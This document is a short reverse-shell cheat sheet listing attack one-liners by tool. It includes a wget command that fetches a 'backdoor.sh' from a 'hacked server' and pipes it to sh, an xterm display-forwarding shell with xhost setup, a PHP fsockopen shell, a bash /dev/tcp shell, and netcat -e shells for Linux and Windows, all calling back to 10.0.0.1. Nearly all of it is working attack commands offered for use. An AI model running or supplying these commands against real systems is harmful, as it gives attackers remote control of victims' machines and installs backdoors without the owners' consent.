reverse shell
wget http://<hacked server>/backdoor.sh -O | sh
xterm
xterm -display 10.0.0.1:1
@ start listener: xnest :1
@add permission to connect: xhost +victimIP
php
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3"); '
Bash
bash -i >& /dev/tcp/10.0.0.1/880 0>&1
netcat
nc 10.0.0.1 1234 -e /bin/sh
nc 10.0.0.1 1234 -e cmd.exe